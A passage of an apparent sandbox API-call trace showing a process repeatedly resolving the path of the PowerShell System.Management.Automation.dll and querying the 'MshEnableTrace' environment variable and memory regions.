GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x23e224, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0154.208] GetLastError () returned 0xcb [0154.208] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x23e1d4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0154.208] GetLastError () returned 0xcb [0154.208] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x23e1d4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0154.208] GetLastError () returned 0xcb [0154.238] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x357e88, nSize=0x80 | out: lpBuffer="") returned 0x0 [0154.238] GetLastError () returned 0xcb [0154.238] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x23d8b4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0154.238] GetLastError () returned 0xcb [0154.238] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x23d864, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0154.238] GetLastError () returned 0xcb [0154.239] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x23d864, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0154.239] GetLastError () returned 0xcb [0154.239] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x23d8b4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0154.239] GetLastError () returned 0xcb [0154.239] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x23d864, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0154.239] GetLastError () returned 0xcb [0154.239] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x23d864, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0154.239] GetLastError () returned 0xcb [0154.239] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x23d8b4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0154.239] GetLastError () returned 0xcb [0154.239] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x23d864, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0154.239] GetLastError () returned 0xcb [0154.240] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x23d864, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0154.240] GetLastError () returned 0xcb [0154.240] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x23d8b4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0154.240] GetLastError () returned 0xcb [0154.240] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x23d864, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0154.240] GetLastError () returned 0xcb [0154.240] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x23d864, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0154.240] GetLastError () returned 0xcb [0154.240] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x23d8b4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0154.240] GetLastError () returned 0xcb [0154.240] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x23d864, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0154.240] GetLastError () returned 0xcb [0154.240] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x23d864, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0154.240] GetLastError () returned 0xcb [0154.240] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x23d8b4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0154.240] GetLastError () returned 0xcb [0154.241] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x23d864, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0154.241] GetLastError () returned 0xcb [0154.241] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x23d864, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0154.241] GetLastError () returned 0xcb [0154.241] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x23d8b4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0154.241] GetLastError () returned 0xcb [0154.241] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x23d864, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0154.241] GetLastError () returned 0xcb [0154.241] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x23d864, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0154.241] GetLastError () returned 0xcb [0154.241] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x23d8b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0154.241] GetLastError () returned 0xcb [0154.241] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x23d860, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0154.241] GetLastError () returned 0xcb [0154.241] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x23d860, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0154.241] GetLastError () returned 0xcb [0154.242] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x23d8b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0154.242] GetLastError () returned 0xcb [0154.242] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x23d860, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0154.242] GetLastError () returned 0xcb [0154.242] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x23d860, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0154.242] GetLastError () returned 0xcb [0154.242] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x23d8b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0154.242] GetLastError () returned 0xcb [0154.242] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x23d860, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0154.242] GetLastError () returned 0xcb [0154.242] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x23d860, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0154.242] GetLastError () returned 0xcb [0154.242] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x23d8b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0154.242] GetLastError () returned 0xcb [0154.242] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x23d860, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0154.242] GetLastError () returned 0xcb [0154.242] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x23d860, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0154.242] GetLastError () returned 0xcb [0154.243] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x23d8b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0154.243] GetLastError () returned 0xcb [0154.243] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x23d860, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0154.243] GetLastError () returned 0xcb [0154.243] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x23d860, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0154.243] GetLastError () returned 0xcb [0154.243] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x23d8b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0154.243] GetLastError () returned 0xcb [0154.243] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x23d860, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0154.243] GetLastError () returned 0xcb [0154.243] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x23d860, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0154.243] GetLastError () returned 0xcb [0154.243] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x23d8b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0154.243] GetLastError () returned 0xcb [0154.243] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x23d860, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0154.243] GetLastError () returned 0xcb [0154.244] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x23d860, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0154.244] GetLastError () returned 0xcb [0154.244] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x23d8b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0154.244] GetLastError () returned 0xcb [0154.244] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x23d860, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0154.244] GetLastError () returned 0xcb [0154.244] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x23d860, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0154.244] GetLastError () returned 0xcb [0154.244] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x23d8b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0154.244] GetLastError () returned 0xcb [0154.244] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x23d860, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0154.244] GetLastError () returned 0xcb [0154.244] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x23d860, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0154.244] GetLastError () returned 0xcb [0154.257] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x23d894, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0154.257] GetLastError () returned 0xcb [0154.257] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x23d844, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0154.257] GetLastError () returned 0xcb [0154.257] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x23d844, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0154.257] GetLastError () returned 0xcb [0154.258] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x23d844, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0154.258] GetLastError () returned 0xcb [0154.334] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x23d894, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0154.334] GetLastError () returned 0xcb [0154.334] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x23d844, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0154.334] GetLastError () returned 0xcb [0154.335] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x23d844, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0154.335] GetLastError () returned 0xcb [0154.335] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x23d894, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0154.335] GetLastError () returned 0xcb [0154.335] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x23d844, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0154.335] GetLastError () returned 0xcb [0154.335] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x23d844, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0154.335] GetLastError () returned 0xcb [0154.335] VirtualQuery (in: lpAddress=0x23cdc0, lpBuffer=0x23ddc0, dwLength=0x1c | out: lpBuffer=0x23ddc0*(BaseAddress=0x23c000, AllocationBase=0x200000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0154.337] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x357e88, nSize=0x80 | out: lpBuffer="") returned 0x0 [0154.337] GetLastError () returned 0xcb [0154.360] VirtualQuery (in: lpAddress=0x23cdc0, lpBuffer=0x23ddc0, dwLength=0x1c | out: lpBuffer=0x23ddc0*(BaseAddress=0x23c000, AllocationBase=0x200000, AllocationProtect=0x4, 